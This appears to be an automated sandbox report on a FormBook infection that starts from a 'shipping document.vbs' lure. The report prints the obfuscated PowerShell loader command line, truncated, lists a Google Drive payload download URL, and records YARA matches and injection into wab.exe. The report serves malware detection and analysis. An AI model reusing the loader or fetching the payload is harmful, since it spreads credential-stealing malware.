Source: wscript.exe, 00000000.00000003.1587198761.0000023236DAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1588971000.0000023236E3A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1589082209.0000023238BA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.1471191935.0000023238C09000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1470955854.0000023238BE1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?b1a9c0e1c6
Source: powershell.exe, 00000003.00000002.1987110176.000001FCDF312000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000003.00000002.1987110176.000001FCDF34C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://drive.usercontent.google.com
Source: firefox.exe, 00000015.00000002.2537345110.000000002C054000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://hostname.domain.tld/
Source: powershell.exe, 00000003.00000002.2059655451.000001FCED5D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1930663126.000000000559B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000009.00000002.1927433604.0000000004687000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1934884709.0000000007141000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.1987110176.000001FCDD561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1927433604.0000000004531000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000009.00000002.1927433604.0000000004687000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1934884709.0000000007141000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1934884709.0000000007099000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000009.00000002.1934884709.0000000007141000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000009.00000002.1934884709.0000000007141000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.ps/Docs/Repository.htm0
Source: powershell.exe, 00000003.00000002.1987110176.000001FCDD561000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000009.00000002.1927433604.0000000004531000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000003.00000002.1987110176.000001FCDD9E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF312000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF335000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000009.00000002.1930663126.000000000559B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000009.00000002.1930663126.000000000559B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000009.00000002.1930663126.000000000559B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.1987110176.000001FCDEFBA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.googP
Source: powershell.exe, 00000003.00000002.1987110176.000001FCDD787000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDEFBA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com
Source: powershell.exe, 00000003.00000002.1987110176.000001FCDD787000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1oDj9i8b8gD74VUcO_0mAaRxSOZjEINB5P
Source: powershell.exe, 00000009.00000002.1927433604.0000000004687000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1oDj9i8b8gD74VUcO_0mAaRxSOZjEINB5XR
Source: powershell.exe, 00000003.00000002.1987110176.000001FCDF339000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.googh
Source: powershell.exe, 00000003.00000002.1987110176.000001FCDF339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDD9EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com
Source: powershell.exe, 00000003.00000002.1987110176.000001FCDD9E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF312000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF335000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDD9EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1oDj9i8b8gD74VUcO_0mAaRxSOZjEINB5&export=download
Source: powershell.exe, 00000009.00000002.1927433604.0000000004687000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1934884709.0000000007141000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.1987110176.000001FCDE9B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.2059655451.000001FCED5D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1930663126.000000000559B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000003.00000002.1987110176.000001FCDD9E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF312000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF335000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000003.00000002.1987110176.000001FCDD9E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF312000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF335000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000003.00000002.1987110176.000001FCDD9E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF312000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF335000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000003.00000002.1987110176.000001FCDD9E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF312000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF335000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000003.00000002.1987110176.000001FCDD9E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF312000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF335000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown HTTPS traffic detected: 142.251.41.14:443 -> 192.168.2.9:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.251.35.161:443 -> 192.168.2.9:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.251.41.14:443 -> 192.168.2.9:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.251.35.161:443 -> 192.168.2.9:49716 version: TLS 1.2

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 00000011.00000002.2753491610.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2249406825.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2755502958.0000000002150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2265395528.0000000021930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2754713283.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2753361689.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2752855309.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: amsi32_5852.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: 00000011.00000002.2753491610.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.2249406825.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000012.00000002.2755502958.0000000002150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.2265395528.0000000021930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000010.00000002.2754713283.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.2753361689.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.2752855309.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: powershell.exe PID: 6856, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5852, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Potential malicious VBS script found (suspicious strings)
Source: Initial file: Forbrugerprises.ShellExecute Investeringsrammens,Kommunikere,"","" ,Arbejdsanvisning
Sample has a suspicious name (potential lure to open the executable)
Source: shipping document.vbs Static file information: Suspicious name
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 6558
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6558
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 6558 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6558 Jump to behavior
Writes or reads registry keys via WMI
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno. Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1 Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf aleGabes. .lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia ' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd ,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249 (Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa( NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o ');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull. HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel ');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st p
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno. Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1 Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf aleGabes. .lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia ' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd ,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249 (Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa( NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o ');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull. HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel ');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st p Jump to behavior
Contains functionality to call native functions
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202535C0 NtCreateMutant,LdrInitializeThunk, 12_2_202535C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252C70 NtFreeVirtualMemory,LdrInitializeThunk, 12_2_20252C70
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252DF0 NtQuerySystemInformation,LdrInitializeThunk, 12_2_20252DF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20253010 NtOpenDirectoryObject, 12_2_20253010
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20253090 NtSetValueKey, 12_2_20253090
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20254340 NtSetContextThread, 12_2_20254340
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20254650 NtSuspendThread, 12_2_20254650
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202539B0 NtGetContextThread, 12_2_202539B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252AB0 NtWaitForSingleObject, 12_2_20252AB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252AF0 NtWriteFile, 12_2_20252AF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252AD0 NtReadFile, 12_2_20252AD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252B60 NtClose, 12_2_20252B60
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252BA0 NtEnumerateValueKey, 12_2_20252BA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252B80 NtQueryInformationFile, 12_2_20252B80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252BE0 NtQueryValueKey, 12_2_20252BE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252BF0 NtAllocateVirtualMemory, 12_2_20252BF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252C00 NtQueryInformationProcess, 12_2_20252C00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252C60 NtCreateKey, 12_2_20252C60
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252CA0 NtQueryInformationToken, 12_2_20252CA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252CF0 NtOpenProcess, 12_2_20252CF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252CC0 NtQueryVirtualMemory, 12_2_20252CC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252D30 NtUnmapViewOfSection, 12_2_20252D30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252D00 NtSetInformationFile, 12_2_20252D00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20253D10 NtOpenProcessToken, 12_2_20253D10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252D10 NtMapViewOfSection, 12_2_20252D10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20253D70 NtOpenThread, 12_2_20253D70
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252DB0 NtEnumerateKey, 12_2_20252DB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252DD0 NtDelayExecution, 12_2_20252DD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252E30 NtWriteVirtualMemory, 12_2_20252E30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252EA0 NtAdjustPrivilegesToken, 12_2_20252EA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252E80 NtReadVirtualMemory, 12_2_20252E80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252EE0 NtQueueApcThread, 12_2_20252EE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252F30 NtCreateSection, 12_2_20252F30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252F60 NtCreateProcessEx, 12_2_20252F60
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252FA0 NtQuerySection, 12_2_20252FA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252FB0 NtResumeThread, 12_2_20252FB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252F90 NtProtectVirtualMemory, 12_2_20252F90
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252FE0 NtCreateFile, 12_2_20252FE0
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF88799C342 3_2_00007FF88799C342
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF88799B596 3_2_00007FF88799B596
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_044EF258 9_2_044EF258
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_044EFB28 9_2_044EFB28
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_044EEF10 9_2_044EEF10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D70E9 12_2_202D70E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202DF0E0 12_2_202DF0E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202CF0CC 12_2_202CF0CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202270C0 12_2_202270C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20210100 12_2_20210100
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202BA118 12_2_202BA118
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202EB16B 12_2_202EB16B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2025516C 12_2_2025516C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F172 12_2_2020F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E01AA 12_2_202E01AA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2022B1B0 12_2_2022B1B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D81CC 12_2_202D81CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C0274 12_2_202C0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202252A0 12_2_202252A0
